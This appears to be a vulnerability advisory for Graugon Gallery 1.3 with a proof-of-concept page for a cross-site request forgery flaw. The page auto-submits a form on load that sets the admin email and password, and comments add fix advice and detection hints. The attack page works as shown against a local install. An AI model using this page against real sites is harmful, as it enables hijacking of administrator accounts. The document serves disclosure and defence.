< ------------------- header data start ------------------- >

#############################################################

# Application Name : Graugon Gallery 1.3

# Vulnerability Type : XSRF (cross-site request forgery)

# Infection : The admin password can be changed remotely and automatically.

# Bug Fix Advice : A session token should be added to the form, and the old password should be required.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<!--
  Demonstration page for the XSRF issue named in the advisory header.
  It is a standalone HTML page, not part of the gallery: when loaded it posts
  the form below to the gallery's functions.php?id=2 without any user action.
  The request body carries only "email" and "password"; the form has no
  per-session token field and no current-password field, which are the two
  gaps the header's fix advice addresses.
  NOTE(review): the header states this changes the admin password; the
  server-side handler is not shown on this page, so that is taken from the
  advisory and not verified here.
  Defender notes: the handler should reject the POST unless it carries a token
  bound to the admin session and the current password; a SameSite attribute on
  the session cookie and an Origin/Referer check add defence in depth. In web
  logs, a POST to this endpoint whose Origin or Referer is a foreign site is
  the signal to look for.
-->
<!-- onload fires Submit() as soon as the page has loaded. -->
<bOdy onload=Submit();>
<!-- Submit() submits the form named "system" through document.system. -->
<script>function Submit(){document.system.submit();}</script>
<!-- Target is a localhost test install; the id=2 query parameter is sent as written. -->
<form method=’post’ action=’http://localhost/gallery/functions.php?id=2’ name=’system’>
<font class=’font1’>Email</font>
<!-- Pre-filled value submitted as "email"; the address shown is masked on this page. -->
<input type=’text’ size=’22’ name=’email’ value=’[email protected]’ class=’edit’>
<font class=’font1’>password</font>
<!-- Pre-filled value submitted as "password"; no existing credential accompanies it. -->
<input type=’text’ size=’22’ name=’password’ value=’123321’ class=’edit’>
<!-- The visible button is not needed for the request, since onload already submits. -->
<input type=’submit’ value=’Save Settings’ class=’submit’>
</form>

< -- bug code end of -- >